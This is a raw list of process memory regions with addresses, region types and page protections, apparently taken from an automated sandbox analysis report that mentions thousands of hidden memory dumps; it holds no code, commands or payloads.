page read and write
1DB2A33B000
heap
page read and write
1FEDCA98000
heap
page read and write
1EC1ECF5000
heap
page read and write
23B63468000
heap
page read and write
1DB2A2ED000
heap
page read and write
1FEDC960000
heap
page read and write
27ADBCE000
stack
page read and write
1C70FD55000
heap
page read and write
7FF7B111C000
unkown
page readonly
1C154470000
heap
page read and write
14A52F60000
heap
page read and write
14AACCF3000
heap
page read and write
217063B9000
heap
page read and write
16196AF1000
heap
page read and write
161970B3000
heap
page read and write
2003D580000
heap
page read and write
138E5BC6000
heap
page read and write
16198428000
heap
page read and write
16196A8F000
heap
page read and write
1C70FC38000
heap
page read and write
1619722E000
heap
page read and write
1443C4BB000
heap
page read and write
1F5A8110000
heap
page read and write
162E1200000
heap
page read and write
281F04C0000
heap
page readonly
16197629000
heap
page read and write
14A52F50000
heap
page read and write
23B634FB000
heap
page read and write
2AC3D68B000
heap
page read and write
16196C4E000
heap
page read and write
1DAF7ED0000
heap
page read and write
B4CEE4E000
stack
page read and write
1443DC62000
heap
page read and write
7FF8F6DA1000
unkown
page execute and read and write
D7169EF000
stack
page read and write
1443BC3A000
heap
page read and write
16197174000
heap
page read and write
14AAE560000
heap
page read and write
3EA4F7E000
stack
page read and write
2AC3D6A1000
heap
page read and write
7FF886B30000
trusted library allocation
page read and write
299AFE80000
heap
page read and write
23B63481000
heap
page read and write
7FF8E7569000
unkown
page execute and read and write
1F5A91F4000
heap
page read and write
1DB2A363000
heap
page read and write
1CCDF53000
stack
page read and write
1619720E000
heap
page read and write
16197392000
heap
page read and write
161975F5000
heap
page read and write
1F5A9DA8000
heap
page read and write
1CCF38D000
stack
page read and write
16197001000
heap
page read and write
16197290000
heap
page read and write
23B636B4000
heap
page read and write
16198300000
direct allocation
page read and write
161982F0000
direct allocation
page read and write
21706350000
heap
page read and write
16197214000
heap
page read and write
161972AF000
heap
page read and write
7FF886C50000
trusted library allocation
page read and write
1619762F000
heap
page read and write
1619711F000
heap
page read and write
16197609000
heap
page read and write
21707D0B000
direct allocation
page read and write
161984B0000
direct allocation
page read and write
16196DDF000
heap
page read and write
16197110000
heap
page read and write
16196C79000
heap
page read and write
1C70FC41000
heap
page read and write
23B63410000
heap
page read and write
16197224000
heap
page read and write
14AAC70E000
heap
page read and write
45A9AFF000
stack
page read and write
1DB2A855000
heap
page read and write
216CF9EB000
heap
page read and write
16196A85000
heap
page read and write
1443BC83000
heap
page read and write
281F2070000
heap
page execute and read and write
1DB2A365000
heap
page read and write
22658F80000
heap
page read and write
16197112000
heap
page read and write
14AAC6D9000
heap
page read and write
16196AEB000
heap
page read and write
21706348000
heap
page read and write
1DB2A369000
heap
page read and write
16197444000
heap
page read and write
7FF8F0952000
unkown
page execute and write copy
7FF8E7528000
unkown
page execute and read and write
259352E0000
heap
page read and write
1DB2C304000
heap
page read and write
161971AE000
heap
page read and write
16196DDF000
heap
page read and write
16197154000
heap
page read and write
1DB2A9C0000
heap
page read and write
14AAC711000
heap
page read and write
161972AF000
heap
page read and write
1443BC3D000
heap
page read and write
14D08990000
heap
page read and write
1443BC52000
heap
page read and write
161975DD000
heap
page read and write
16198390000
direct allocation
page read and write
1443BC49000
heap
page read and write
1EC1EC60000
heap
page read and write
1CCE27F000
stack
page read and write
14AACB73000
heap
page read and write
16198D90000
direct allocation
page read and write
161970C6000
heap
page read and write
7FF886972000
trusted library allocation
page read and write
14D086EB000
heap
page read and write
16196D44000
heap
page read and write
165CC745000
heap
page read and write
1619711C000
heap
page read and write
7FF886B80000
trusted library allocation
page execute and read and write
25B5B72C000
heap
page read and write
16196DD4000
heap
page read and write
16196C45000
heap
page read and write
1CCE5BF000
stack
page read and write
1F5A9218000
heap
page read and write
162E1226000
heap
page read and write
1619745A000
heap
page read and write
1F5A78F5000
heap
page read and write
7FF8F9D71000
unkown
page readonly
23B634E4000
heap
page read and write
25B5CFA4000
heap
page read and write
2B245C50000
heap
page read and write
1443BC6A000
heap
page read and write
16197165000
heap
page read and write
1DB2A367000
heap
page read and write
25B5B700000
heap
page read and write
16196DC5000
heap
page read and write
1443BC56000
heap
page read and write
1DB2A830000
heap
page read and write
1CCE579000
stack
page read and write
7FF8E795B000
unkown
page execute and read and write
1619712A000
heap
page read and write
161970EF000
heap
page read and write
21706353000
heap
page read and write
1443BC16000
heap
page read and write
2AC3D870000
heap
page read and write
1E764270000
heap
page read and write
23B63417000
heap
page read and write
7FF886B30000
trusted library allocation
page execute and read and write
21707CB0000
direct allocation
page read and write
1DB2A9A7000
heap
page read and write
264910F2000
heap
page read and write
25B5B729000
heap
page read and write
23B636B5000
heap
page read and write
161971BF000
heap
page read and write
161978C9000
heap
page read and write
16198850000
direct allocation
page read and write
217063A4000
heap
page read and write
23B65424000
heap
page read and write
7DF4F68D0000
trusted library allocation
page execute and read and write
7FF886A90000
trusted library allocation
page execute and read and write
1619720E000
heap
page read and write
14CE2551000
heap
page read and write
14AAC708000
heap
page read and write
217063C2000
heap
page read and write
7FF886CC4000
trusted library allocation
page read and write
1DB2A357000
heap
page read and write
9CAE3FF000
stack
page read and write
23B634E8000
heap
page read and write
16197351000
heap
page read and write
161973F1000
heap
page read and write
23B636BA000
heap
page read and write
1FEDCAA0000
heap
page read and write
1ABF56D1000
heap
page read and write
1619725F000
heap
page read and write
23B634E8000
heap
page read and write
16197178000
heap
page read and write
16194BAE000
heap
page read and write
23B63600000
heap
page read and write
1443BC07000
heap
page read and write
25B5AF0A000
heap
page read and write
1DB2A318000
heap
page read and write
161987F0000
direct allocation
page read and write
16196ABE000
heap
page read and write
1F5A5E70000
heap
page readonly
16197612000
heap
page read and write
16197132000
heap
page read and write
1D516AE0000
heap
page read and write
16196DC1000
heap
page read and write
23ADBFF000
stack
page read and write
7FF886CC0000
trusted library allocation
page read and write
14AAC6F2000
heap
page read and write
165CC8F0000
heap
page read and write
1EC1ED27000
heap
page read and write
7FF8E79F5000
unkown
page execute and read and write
1443BC24000
heap
page read and write
1619711A000
heap
page read and write
165CC745000
heap
page read and write
281F0250000
heap
page read and write
161975E8000
heap
page read and write
161970C6000
heap
page read and write
217099C9000
direct allocation
page read and write
16196DB0000
heap
page read and write
3C67FFF000
stack
page read and write
16196E02000
heap
page read and write
16196D48000
heap
page read and write
61D1AFC000
stack
page read and write
1ABF568F000
heap
page read and write
7FF8E755C000
unkown
page execute and read and write
14D0A040000
heap
page execute and read and write
1443DC74000
heap
page read and write
28181517000
trusted library allocation
page read and write
61D1BFF000
unkown
page read and write
1257DC000
stack
page read and write
16196A4C000
heap
page read and write
16196A8B000
heap
page read and write
2A157FE000
stack
page read and write
16196CCF000
heap
page read and write
7FF8F0D16000
unkown
page execute and write copy
16197404000
heap
page read and write
23B636E9000
heap
page read and write
1443C4BA000
heap
page read and write
16198330000
direct allocation
page read and write
16197FA6000
heap
page read and write
7FF8E7293000
unkown
page execute and read and write
2170639F000
heap
page read and write
14D0A0C4000
heap
page read and write
1DB2A85A000
heap
page read and write
1619711A000
heap
page read and write
16198310000
direct allocation
page read and write
16197116000
heap
page read and write
7FF8F5850000
unkown
page readonly
162E1226000
heap
page read and write
21706391000
heap
page read and write
1DB2A857000
heap
page read and write
1DB2A358000
heap
page read and write
1443C303000
heap
page read and write
25B5AEF0000
heap
page read and write
281F26ED000
heap
page read and write
16196A72000
heap
page read and write
433B07F000
stack
page read and write
7FF71D320000
unkown
page readonly
25B5CFB4000
heap
page read and write
299AFFC0000
heap
page read and write
23B636D1000
heap
page read and write
2AC3D698000
heap
page read and write
7FF886CA0000
trusted library allocation
page read and write
1443BBC0000
heap
page read and write
21570357000
heap
page read and write
16196DB0000
heap
page read and write
7FF8869CC000
trusted library allocation
page execute and read and write
14D0A895000
trusted library allocation
page read and write
1FEDCA40000
heap
page read and write
14D22740000
heap
page execute and read and write
215702E5000
heap
page read and write
5E9067F000
stack
page read and write
16196DAB000
heap
page read and write
16197634000
heap
page read and write
2500C460000
heap
page read and write
16197116000
heap
page read and write
28181199000
trusted library allocation
page read and write
7FF8F830E000
unkown
page read and write
161987E0000
direct allocation
page read and write
2502CF4000
stack
page read and write
1A70808D000
heap
page read and write
16197224000
heap
page read and write
21570360000
heap
page read and write
16197610000
heap
page read and write
216CFA00000
heap
page read and write
7FF886BD0000
trusted library allocation
page read and write
283A4A31000
heap
page read and write
7FF886B32000
trusted library allocation
page read and write
1273F530000
heap
page read and write
259351E0000
heap
page read and write
7FF8E7510000
unkown
page readonly
1D99D7B0000
heap
page read and write
16197123000
heap
page read and write
7FF8E7AFF000
unkown
page execute and read and write
25B5AF28000
heap
page read and write
25B5CFAE000
heap
page read and write
1443C4B5000
heap
page read and write
14D22834000
heap
page read and write
1619710E000
heap
page read and write
1443BF8B000
heap
page read and write
7FF8869EC000
trusted library allocation
page execute and read and write
25B5AEE6000
heap
page read and write
26491275000
heap
page read and write
161984B4000
direct allocation
page read and write
23B634B4000
heap
page read and write
7FF71D358000
unkown
page readonly
7FF8E7360000
unkown
page readonly
28190021000
trusted library allocation
page read and write
1443BC07000
heap
page read and write
1F5A9218000
heap
page read and write
ADB8B5F000
stack
page read and write
2AC3D640000
heap
page read and write
2B245A80000
heap
page read and write
5CD3D7E000
stack
page read and write
25B5B5B0000
heap
page read and write
1619756E000
heap
page read and write
75836FF000
stack
page read and write
24B52C00000
heap
page read and write
5DD597F000
stack
page read and write
16197634000
heap
page read and write
7FF8E756C000
unkown
page read and write
7FF886CD0000
trusted library allocation
page read and write
16196DCF000
heap
page read and write
1F5A923C000
heap
page read and write
1443BC52000
heap
page read and write
1DB2A335000
heap
page read and write
216CFB80000
heap
page read and write
1619711C000
heap
page read and write
1C70FC00000
heap
page read and write
7FF71D34E000
unkown
page read and write
16196DD4000
heap
page read and write
2649112C000
heap
page read and write
16198370000
direct allocation
page read and write
161970A9000
heap
page read and write
1EC1ED27000
heap
page read and write
2A9491C000
stack
page read and write
7FF8E7BAD000
unkown
page execute and read and write
1A7082D5000
heap
page read and write
7FF8E75D2000
unkown
page read and write
7FF88699D000
trusted library allocation
page execute and read and write
16197123000
heap
page read and write
16196DC5000
heap
page read and write
2500C2E0000
heap
page read and write
16197228000
heap
page read and write
14CE2551000
heap
page read and write
16197360000
heap
page read and write
1619712E000
heap
page read and write
25B5B729000
heap
page read and write
7FF886B90000
trusted library allocation
page read and write
16197077000
heap
page read and write
2502DFE000
stack
page read and write
1273F285000
heap
page read and write
14A52FD1000
heap
page read and write
1DB2A4D0000
trusted library allocation
page read and write
161971E8000
heap
page read and write
23588FF000
unkown
page read and write
7FF8E7351000
unkown
page execute and write copy
1ABF565F000
heap
page read and write
161982F0000
direct allocation
page read and write
16196DD4000
heap
page read and write
3A151DE000
stack
page read and write
161965B0000
direct allocation
page read and write
1619725F000
heap
page read and write
23B63463000
heap
page read and write
7FF886CA3000
trusted library allocation
page read and write
161970CF000
heap
page read and write
7FF886C40000
trusted library allocation
page read and write
7FF886970000
trusted library allocation
page read and write
162E11E0000
heap
page readonly
7FF8E74E9000
unkown
page execute and read and write
16196DCF000
heap
page read and write
208D7EB0000
heap
page read and write
7FF886B74000
trusted library allocation
page read and write
25B5AF2C000
heap
page read and write
2AC3D6A1000
heap
page read and write
16197762000
heap
page read and write
16196DD4000
heap
page read and write
14AAC6D6000
heap
page read and write
23B63461000
heap
page read and write
138E5BBE000
heap
page read and write
16196DD4000
heap
page read and write
B4CD9EE000
stack
page read and write
161970CF000
heap
page read and write
138E5DA0000
heap
page read and write
22658F70000
heap
page read and write
281F25BD000
heap
page read and write
1443DC6D000
heap
page read and write
16196D6C000
heap
page read and write
161971E4000
heap
page read and write
14AAC700000
heap
page read and write
7FF8E734E000
unkown
page execute and read and write
161970E8000
heap
page read and write
7FF8E7B6E000
unkown
page execute and read and write
16198340000
direct allocation
page read and write
161974FC000
heap
page read and write
264910F2000
heap
page read and write
161971FE000
heap
page read and write
216CF9C0000
heap
page read and write
7FF886993000
trusted library allocation
page execute and read and write
1F5A5E80000
heap
page read and write
25B5B718000
heap
page read and write
23B6346B000
heap
page read and write
1443BC41000
heap
page read and write
7FF886B80000
trusted library allocation
page read and write
14D0A73A000
trusted library allocation
page read and write
217099A0000
direct allocation
page read and write
138E5B9B000
heap
page read and write
22659018000
heap
page read and write
16198450000
direct allocation
page read and write
7FF8E7290000
unkown
page execute and read and write
1D516AD0000
heap
page read and write
1EC1ED09000
heap
page read and write
281F1FDA000
heap
page read and write
B4CE2FE000
stack
page read and write
1619712C000
heap
page read and write
14D087B7000
heap
page read and write
23B6347A000
heap
page read and write
16197629000
heap
page read and write
281F0220000
heap
page read and write
16196ABB000
heap
page read and write
16196C95000
heap
page read and write
1443C2EC000
heap
page read and write
1DB2A2F0000
trusted library allocation
page read and write
281F0450000
heap
page read and write
1619711C000
heap
page read and write
2818152C000
trusted library allocation
page read and write
7FF8E75E0000
unkown
page readonly
A2BF6FB000
stack
page read and write
6B58A7F000
stack
page read and write
22630E50000
heap
page read and write
7FF886C10000
trusted library allocation
page read and write
16197762000
heap
page read and write
23B63470000
heap
page read and write
14AAC709000
heap
page read and write
2003D48D000
heap
page read and write
23D53D3A000
heap
page read and write
5E906FF000
stack
page read and write
1273F288000
heap
page read and write
1DB2A9AE000
heap
page read and write
1EC1ED27000
heap
page read and write
21706270000
heap
page read and write
7FF886DC0000
trusted library allocation
page read and write
16196ADD000
heap
page read and write
1DB2A379000
heap
page read and write
7FF886BC0000
trusted library allocation
page read and write
7FF886BB0000
trusted library allocation
page read and write
14AACB7E000
heap
page read and write
161970FA000
heap
page read and write
1443C2F9000
heap
page read and write
23B634F1000
heap
page read and write
1619740F000
heap
page read and write
5CD3CFE000
stack
page read and write
1A81FA40000
heap
page read and write
There are 3020 hidden memdumps, click here to show them.